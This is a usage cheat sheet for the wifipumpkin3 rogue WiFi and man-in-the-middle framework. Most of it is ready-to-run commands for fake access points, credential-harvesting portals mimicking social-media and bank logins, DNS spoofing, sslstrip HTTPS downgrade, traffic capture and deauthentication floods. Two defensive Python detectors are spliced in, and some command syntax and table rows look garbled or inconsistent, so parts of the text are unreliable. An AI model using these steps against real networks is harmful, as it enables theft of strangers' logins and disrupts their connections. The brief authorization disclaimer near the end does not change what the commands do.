wifipumpkin3

Overview

wifipumpkin3 is a powerful Python 3 framework for creating rogue WiFi access points and performing MITM (Man-in-the-Middle) attacks. It enables wireless penetration testing through fake WiFi networks, captive portal credential harvesting, DNS spoofing, and traffic interception. Designed for authorized security testing and red team operations.

Installation

Command                                                Description
git clone https://github.com/mh4x0f/wifipumpkin3.git   Clone the repository
cd wifipumpkin3                                        Navigate to directory
python3 -m pip install -r requirements.txt             Install dependencies
sudo python3 setup.py install                          Install wifipumpkin3 globally
pip3 install --user wifipumpkin3                       User-level installation

Prerequisites

  • Linux system (Kali, Ubuntu, Debian recommended)
  • Python 3.6+
  • Wireless adapter with monitor mode capability
  • Root/sudo privileges required
  • hostapd, dnsmasq, iptables installed

Basic Commands

Command                       Description
sudo wifipumpkin3             Launch interactive mode
sudo wifipumpkin3 -i          Interactive CLI mode
sudo wifipumpkin3 --help      Display help menu
sudo wifipumpkin3 --version   Show version information
sudo wifipumpkin3 -x          Exit without cleanup

Creating Rogue Access Points

Basic Rogue AP Setup

# Launch interactive mode
sudo wifipumpkin3

# In interactive menu:
# 1. Select wireless interface
# 2. Choose SSID name
# 3. Configure channel
# 4. Set authentication type (Open/WPA2)
# 5. Start AP

Command-Line AP Creation

# Start with specific SSID
sudo wifipumpkin3 --ssid "FreeWiFi" --interface wlan0

# Set channel
sudo wifipumpkin3 --ssid "Corporate" --channel 6

# Configure WPA2 password
sudo wifipumpkin3 --ssid "Secure" --password "123456"

# Open network (no authentication)
sudo wifipumpkin3 --ssid "OpenNet" --type open

Wireless Interface Management

Command                        Description
ifconfig                       List network interfaces
ip link show                   Display interface status
sudo airmon-ng check kill      Kill blocking processes
sudo airmon-ng start wlan0     Enable monitor mode (wlan0mon)
sudo airmon-ng stop wlan0mon   Disable monitor mode
iwconfig                       Check wireless configuration

Captive Portal Configuration

Portal Types

Portal Type     Use Case
Login Portal    Harvests username/password
Social Media    Fake Facebook/Instagram login
Update Portal   Fake system/browser updates
ISP Portal      Mimics ISP authentication
Custom HTML     User-defined portal page

Creating Custom Captive Portal

# Access portal templates directory
cd /usr/share/wifipumpkin3/template

# View available templates
ls -la

# Edit HTML template
nano custom_portal.html

# Template structure:
# - HTML form with POST method
# - Target: /api/auth or custom endpoint
# - Fields for username, password, email, phone

Basic HTML Portal Template

cat > /tmp/portal.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
    <title>WiFi Login</title>
    <style>
        body { font-family: Arial; text-align: center; padding: 50px; }
        form { max-width: 300px; margin: auto; }
        input { width: 100%; padding: 10px; margin: 10px 0; }
        button { width: 100%; padding: 10px; background: #007bff; color: white; }
    </style>
</head>
<body>
    <h1>Free WiFi</h1>
    <form method="POST" action="/api/auth">
        <input type="email" name="email" placeholder="Email" required>
        <input type="password" name="password" placeholder="Password" required>
        <button type="submit">Connect</button>
    </form>
</body>
</html>
EOF

DNS Spoofing

DNS Configuration

Command                     Description
set dns.server [IP]         Set DNS server IP
set dns.redirect [domain]   Redirect domain
enable dns                  Enable DNS spoofing
disable dns                 Disable DNS spoofing

DNS Spoof Examples

# Redirect all traffic to attacker IP
sudo wifipumpkin3 --dns-spoof 192.168.1.100

# Spoof specific domain
# Edit /etc/wifipumpkin3/dns.conf
192.168.1.100 google.com
192.168.1.100 facebook.com
192.168.1.100 twitter.com

# Load custom DNS config
sudo wifipumpkin3 --dns-config /path/to/dns.conf
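
A client-side check for the pattern in the dns.conf entries above, where unrelated public domains all resolve to one private address. This is an added example, not part of wifipumpkin3; the function names, the `.local` internal suffix and the sample answers are assumptions constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: (queried name, A record returned). The first three
# mirror the dns.conf entries above; the last two are benign answers.
SAMPLE_ANSWERS = [
    ("google.com", "192.168.1.100"),
    ("facebook.com", "192.168.1.100"),
    ("twitter.com", "192.168.1.100"),
    ("dns.google", "8.8.8.8"),
    ("printer.local", "192.168.1.20"),
]

def base_domain(name):
    """Naive registrable domain: last two labels (assumption, no PSL lookup)."""
    return ".".join(name.rstrip(".").lower().split(".")[-2:])

def find_spoofed_answers(answers, internal_suffixes=(".local",)):
    """Return {name: [reasons]} for answers that look locally spoofed."""
    external_by_ip = defaultdict(set)
    findings = defaultdict(list)
    for name, ip in answers:
        if name.lower().rstrip(".").endswith(internal_suffixes):
            continue  # internal names may legitimately map to RFC 1918 space
        addr = ipaddress.ip_address(ip)
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            findings[name].append(f"public name resolved to non-routable {ip}")
            external_by_ip[ip].add(base_domain(name))
    # Several unrelated public domains on one non-routable address is the
    # signature of a catch-all or hosts-style redirect.
    for name, ip in answers:
        if name in findings and len(external_by_ip[ip]) > 1:
            findings[name].append(
                f"{len(external_by_ip[ip])} unrelated domains share {ip}")
    return dict(findings)

if __name__ == "__main__":
    for name, reasons in find_spoofed_answers(SAMPLE_ANSWERS).items():
        print(name, "->", "; ".join(reasons))
```

Feed it the answers a monitoring host receives from the network's DHCP-assigned resolver; a captive portal on a guest network can trigger the first rule legitimately, so treat the shared-address rule as the stronger signal.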

DHCP Server Configuration

Setting            Command
DHCP range start   set dhcp.start 192.168.1.100
DHCP range end     set dhcp.end 192.168.1.200
Gateway IP         set dhcp.gateway 192.168.1.1
Subnet mask        set dhcp.netmask 255.255.255.0
DNS server         set dhcp.dns 192.168.1.1
Lease time         set dhcp.lease 3600

DHCP Configuration File

# DHCP config location
/etc/wifipumpkin3/dhcp.conf

# Example configuration
interface=wlan0
dhcp-range=192.168.1.100,192.168.1.200,12h
dhcp-option=option:router,192.168.1.1
dhcp-option=option:dns-server,192.168.1.1
dhcp-option=option:domain-name,local

Proxy Plugins (Pumpkin-Proxy)

Available Proxy Modules

Module        Function
urllib3       HTTP/HTTPS proxy
dns-spoof     DNS hijacking
inject-code   Code injection
redirect      Traffic redirection
log-traffic   Packet logging

Enable Proxy Plugin

# In interactive mode
plugins
# Select proxy module
# Configure options

# CLI method
sudo wifipumpkin3 --plugin urllib3 --plugin-opts "log=true"

Custom Proxy Configuration

# Edit proxy configuration
nano /etc/wifipumpkin3/proxy.conf

# Configuration options
[proxy]
enabled = true
port = 8080
log_traffic = true
log_file = /var/log/wifipumpkin3/proxy.log
cache_enabled = true

Traffic Sniffing and Logging

Command               Description
sniff start           Begin packet capture
sniff stop            End packet capture
sniff export          Export captured data
sniff filter [type]   Filter by packet type
log view              View activity logs
log clear             Clear log files

Packet Capture Examples

# Capture HTTP credentials
sudo wifipumpkin3 --sniff http

# Capture HTTPS traffic
sudo wifipumpkin3 --sniff https

# Capture all traffic
sudo wifipumpkin3 --sniff all

# Save to PCAP file
sudo wifipumpkin3 --pcap /tmp/capture.pcap

Log File Locations

# Main logs
/var/log/wifipumpkin3/

# Credential captures
/var/log/wifipumpkin3/credentials.log

# Traffic logs
/var/log/wifipumpkin3/traffic.log

# Captured clients
/var/log/wifipumpkin3/clients.log

Credential Harvesting

Captive Portal Harvesting

# Enable credential logging
set logging.credentials true

# View captured credentials
tail -f /var/log/wifipumpkin3/credentials.log

# Export credentials
wifipumpkin3-export --format csv credentials.log

Credential Format

[timestamp] - username:password
[timestamp] - email:password
[timestamp] - phone:code

Targeted Credential Harvesting

# Harvest specific service credentials
sudo wifipumpkin3 --portal facebook

# Social media harvesting
sudo wifipumpkin3 --portal instagram

# Bank login harvesting
sudo wifipumpkin3 --portal banking

Deauthentication Attacks

Deauth Commands

Command                  Description
deauth all               Deauth all clients
deauth [MAC]             Target specific client
deauth --bssid [BSSID]   Deauth by AP
deauth --count [N]       Send N deauth frames
deauth --interval [ms]   Set interval between frames

Deauth Examples

# Deauth all clients from AP
sudo wifipumpkin3 --deauth all

# Deauth specific client
sudo wifipumpkin3 --deauth AA:BB:CC:DD:EE:FF

# Continuous deauth with interval
sudo wifipumpkin3 --deauth all --interval 100

# Limit deauth packets
sudo wifipumpkin3 --deauth all --count 50
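
How a monitoring sensor can recognise the bursts described above (many deauthentication frames at a fixed short interval, often to the broadcast address). This is an added example, not part of wifipumpkin3; the function names, the window and threshold values, and the MAC addresses in the sample capture are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_deauth_floods(frames, window_s=5.0, threshold=20):
    """Alert once per burst when one BSSID emits >= threshold deauth frames
    within window_s seconds.

    frames: (timestamp_s, bssid, destination_mac) tuples for deauthentication
    frames only, sorted by timestamp (e.g. exported from a monitor-mode capture).
    """
    recent = defaultdict(deque)   # bssid -> (ts, dest) entries inside the window
    active = set()                # BSSIDs currently above the threshold
    alerts = []
    for ts, bssid, dest in frames:
        q = recent[bssid]
        q.append((ts, dest))
        while ts - q[0][0] > window_s:
            q.popleft()
        if len(q) < threshold:
            active.discard(bssid)
        elif bssid not in active:
            active.add(bssid)
            alerts.append({
                "bssid": bssid,
                "first_seen": q[0][0],
                "frames_in_window": len(q),
                # Broadcast destination: every client of the AP is targeted.
                "broadcast": any(d == BROADCAST for _, d in q),
            })
    return alerts

def sample_frames():
    """Constructed capture: 50 broadcast deauths 100 ms apart, plus the
    occasional legitimate deauth from a second AP."""
    burst = [(10.0 + i * 0.1, "02:00:00:00:00:01", BROADCAST) for i in range(50)]
    normal = [(t, "02:00:00:00:00:02", "02:00:00:00:00:aa") for t in (1.0, 40.0, 90.0)]
    return sorted(burst + normal)

if __name__ == "__main__":
    for alert in detect_deauth_floods(sample_frames()):
        print(alert)
```

Enabling 802.11w Protected Management Frames on the AP and its clients lets clients reject forged deauthentication frames; the counter above covers networks where PMF is not enforced.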

Module System

Available Modules

Module      Purpose
hostapd     Access point control
dnsmasq     DHCP/DNS server
iptables    Packet filtering/NAT
ettercap    MITM attack engine
sslstrip    HTTPS downgrade
mitmproxy   HTTP/HTTPS proxy
mitmproxyHTTP/HTTPS proxy

Module Management

# List loaded modules
modules list

# Enable module
modules enable [name]

# Disable module
modules disable [name]

# Check module status
modules status

# View module logs
modules log [name]

Custom Module Creation

# Module directory
/usr/share/wifipumpkin3/modules/

# Module template
#!/usr/bin/env python3
class CustomModule:
    def __init__(self):
        self.name = "custom_module"
        self.enabled = False
    
    def start(self):
        self.enabled = True
    
    def stop(self):
        self.enabled = False

Interactive Mode Menu

# Access main menu
? - Show commands
help - Display full help
exit - Quit application
clear - Clear screen

# Submenu access
ap - Access point settings
dhcp - DHCP configuration
dns - DNS spoofing options
proxy - Proxy settings
plugins - Load plugins
sniff - Packet sniffing
logs - View logs
clients - Connected clients

Client Management

# List connected clients
clients list

# Show client details
clients info [MAC]

# Kick client offline
clients kick [MAC]

# Block client MAC
clients block [MAC]

# View client packets
clients sniff [MAC]

Advanced Usage

Starting with Configuration File

# Create config file
cat > /tmp/wifipumpkin3.conf << 'EOF'
[ap]
ssid = FreeWiFi
interface = wlan0
channel = 6
password = 

[dhcp]
start = 192.168.1.100
end = 192.168.1.200
gateway = 192.168.1.1

[dns]
spoof = true
redirect = 192.168.1.1

[logging]
credentials = true
traffic = true
EOF

# Launch with config
sudo wifipumpkin3 --config /tmp/wifipumpkin3.conf

Multi-SSID Broadcasting

# Create multiple SSIDs
sudo wifipumpkin3 --ssid "FreeWiFi" --ssid "Starbucks" --ssid "Airport"

# Different channels per SSID
sudo wifipumpkin3 --ssid "Network1" --channel 1 --ssid "Network2" --channel 6

SSL Strip Configuration

# Enable HTTPS downgrade
set sslstrip.enabled true

# Configure port
set sslstrip.port 8080

# Log SSL sessions
set sslstrip.log true

Troubleshooting

Issue                   Solution
"Permission denied"     Run with sudo
Adapter in use          sudo airmon-ng check kill
DHCP not working        Restart dnsmasq: sudo service dnsmasq restart
DNS not resolving       Check /etc/resolv.conf permissions
Clients can’t connect   Verify hostapd is running: ps aux | grep hostapd
Capture not logging     Check log directory permissions: chmod 755 /var/log/wifipumpkin3/

Debug Mode

# Run with verbose logging
sudo wifipumpkin3 -vvv

# Enable debug output
sudo wifipumpkin3 --debug

# Check service status
sudo systemctl status wifipumpkin3

# View system logs
sudo journalctl -u wifipumpkin3 -f

Cleanup and Restoration

# Stop all wifipumpkin3 processes
sudo wifipumpkin3 --stop

# Kill AP and restore network
sudo wifipumpkin3 --cleanup

# Reset hostapd
sudo killall hostapd

# Restart networking
sudo systemctl restart networking

# Restore iptables rules
sudo iptables -t nat -F
sudo iptables -t nat -X
sudo iptables -F
sudo iptables -X

  • Authorization required: Only use on networks you own or have explicit permission to test
  • Jurisdiction: Check local laws regarding WiFi interception and MITM attacks
  • Logging: Comply with data retention and privacy laws
  • Disclosure: Report vulnerabilities to system owners
  • Professional use: Restrict to authorized penetration testing engagements

Resources

Resource             Purpose
GitHub Repository    Official source code
Documentation Wiki   Full documentation
Issue Tracker        Bug reports and support
Kali Tools           Kali Linux integration

  • hostapd - WiFi access point daemon
  • dnsmasq - DHCP and DNS server
  • ettercap - Network MITM framework
  • mitmproxy - Interactive HTTPS proxy
  • Wireshark - Network packet analysis
  • aircrack-ng - WiFi security auditing
  • hashcat - Password hash cracking